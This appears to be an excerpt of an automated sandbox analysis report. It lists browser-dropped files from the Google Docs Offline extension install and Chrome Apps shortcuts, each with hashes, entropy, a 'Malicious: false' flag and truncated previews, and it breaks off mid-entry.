C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11280
Entropy (8bit):	5.752941882424501
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvVpfcNLFev:m8IEI4u8ROxev
MD5:	F897300492E3AB467E56883D23D02D77
SHA1:	DECD6DC9E70ECCF9B45983147680614C019B99EA
SHA-256:	F9B3A5747DEDCB5AED58FCFC0F4FD3BD2F2E903F2CCEF90A92A73DBC0F8C3DBD
SHA-512:	B8AC574E24814BAF04A264E7F3F00B4285CD7B66104DFC77897440A898FCA5230775300EC7DEF723678975A04C2CD1BC73A44F77DA26262E8704029930990C62
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417781191647272
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1H9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APHgiVb
MD5:	35068E2550395A8A3E74558F2F4658DA
SHA1:	BD6620054059BFB7A27A4FFF86B9966727F2C2B9
SHA-256:	E2F418C816895E830541F48C0406B9398805E88B61A4EC816244154CD793743C
SHA-512:	4BCB971D7353648ABF25ACA7A4A4771F62BBB76F8FC13BDE886F29826D9314F5101942492004FC719493604D317958B63A95CF5173F8180214F27D6BEA303F97
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3700)
Category:	dropped
Size (bytes):	95606
Entropy (8bit):	5.405749379350638
Encrypted:	false
SSDEEP:	1536:rFTnpa+88KmEfryTdXPVy0d8RZZ0Qk4CWbsnf29Gmyj9tIRRduRnCrl:almPXPVCFCWbsnDVQRwF0l
MD5:	9D0EF4F7CB0306DCB7A7CDCD6DC2CCC7
SHA1:	88D7F0A88C5807BFE00F13B612CC0522EEBE514A
SHA-256:	E5E4392B21A21ECAFD27707BF70F95961B2656735A20B40BA54479D40EAB063C
SHA-512:	34CD9AF9199DE606A531E98DB82BEAA5552E59BCCB2AB2BF49F82D6FA05425EB6936BC5F03BFC421AB6980B91395D9FDC5F0776882E1D49B3217CD35641FF906
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3705)
Category:	dropped
Size (bytes):	104595
Entropy (8bit):	5.385879258644142
Encrypted:	false
SSDEEP:	1536:CvBfoqPByzpq7Wj3X5GtH2n4JvHDxwKMpFs0vuFfkR/2oTnHu96Iny0Kj2ThzfS:BlXQtoZrs0vskDTHu9rhTS
MD5:	4E0C47897BF98DEAC56F800942E150C4
SHA1:	7903D30E0ACEE273724BDAA67446D9FD4E8460A5
SHA-256:	FE76EA0C2F81E6140F38F4143B40BE85014B93FF80737600CFB39AEB5C8C6537
SHA-512:	8B31463FC683439BAB5D4AEFE2BE0F6A9F5B695C2D95AFF3F842BFC74B10AE3D386D288121161506F74A08FB86D25C1096DA4177B768254BF84E83983982640F
Malicious:	false
Preview:	'use strict';function aa(){return function(){}}function k(a){return function(){return this[a]}}function ba(a){return function(){return a}}var n;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=ea(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");retu

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\ac38c1e0-c01c-460b-9f36-0aa67db5eeec.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135771
Entropy (8bit):	7.802585890890899
Encrypted:	false
SSDEEP:	3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
MD5:	DA75BB05D10ACC967EECAAC040D3D733
SHA1:	95C08E067DF713AF8992DB113F7E9AEC84F17181
SHA-256:	33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
SHA-512:	56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.\|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?."...9M......[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 13 18:39:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9690322609816797
Encrypted:	false
SSDEEP:	48:8e2d/OTfK8RuH2idAKZdA19ehwiZUklqehHy+3:8GP7Ay
MD5:	962B835836099EAAE47C987E48200A8C
SHA1:	CADF3B2529856931E07F2B2746DBCEA49275B894
SHA-256:	27A5CDD34EBCB804EFCB79D396D2CF748000790A34D335B5B86275D2274AEEE0
SHA-512:	B5843BAE15F441BF261203957598A16266C92E2734365FA235FEAEF8A837968092B69D05ACDA922618529DC8B14BA4DBDBF42379F4633CB089ABB2E118F9F44C
Malicious:	false
Preview:	L..................F.@.. ...$+.,....X.E..6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ImY.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VmY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VmY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VmY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VmY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-m......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 13 18:39:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.986798493070277
Encrypted:	false
SSDEEP:	48:852d/OTfK8RuH2idAKZdA1weh/iZUkAQkqehwy+2:85PJ9QFy
MD5:	EEB132DB5ABD50477C2A3C1250E96BD2
SHA1:	3815FD10588B79310F794C6AEED3A7B531027FC4
SHA-256:	514C935F549579209FFFB2FD053154F2F0A6CAAA60FA05D4C3B3592E917688A2
SHA-512:	44AE1ABC0CD9E99D5B4DCE03A20BF05B20B8B9C63024CF64F33246166E562956A5524F8EC7F947F1D4E9946966E601DA533BEF69D74E602B7D6463235F53E2F0
Malicious:	false
Preview:	L..................F.@.. ...$+.,......<..6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ImY.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VmY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VmY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VmY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VmY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-m......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.001255119460023
Encrypted:	false
SSDEEP:	48:8x42d/OTfK8RsH2idAKZdA14tseh7sFiZUkmgqeh7sOy+BX:8xcPLnEy
MD5:	355CA3F93DC4B2DC175C34F0B5C4A853
SHA1:	F3857C3EA2F0FB86AC6230DA33FD886A813C9498
SHA-256:	F597F3BC6D4F897CD5528D6B6145DC534A4CA21DEE66E635CFFB161BC730B93E
SHA-512:	2AB0F35EDEB10BAD732033650D59EB335E7B96E25B58DF756E9C6BFBCFF28A574228C694FF5A9083735805886384F96147F82312C1B5048C04B3FEAF1DAB8923
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ImY.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VmY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VmY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VmY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-m......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 13 18:39:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.984514879241055
Encrypted:	false
SSDEEP:	48:8A2d/OTfK8RuH2idAKZdA1vehDiZUkwqehMy+R:8UPK2y
MD5:	40DB57609FB79D1F194EE6499A4D43FF
SHA1:	128AAB712153106AFB84332432310FFCE67D185A
SHA-256:	172A42B6DFC8DDFA165921E9B46217F16C9A641A871AE11FE61E0900BBC6E740
SHA-512:	B2FAFDEF908DFB6D4243C7F7A9895B66085928F9DC8AF6A99DE021823C52BC37B6EFD27DE5CE16EDE00EBBCF46833F4A642F69A8CA52727E8ACDF2C9FC1F499D
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....`8..6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.ImY.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VmY.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VmY.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VmY............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VmY............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-m......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 13 18:39:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9713208193884526
Encrypted:	false
SSDEEP:	48:8W2d/OTfK8RuH2idAKZdA1hehBiZUk1W1qehiy+C:8OPq9Cy
MD5:	64A6FBB0A756FEC8514BB7E39E13BAEF
SHA1:	3A89394EEEBAF06DA8A749E8C6A59EB9A8C714B7
SHA-256:	030BBA70C5B84338D27DCF6628F85615615AAC1408956710C19606C5131D72F1
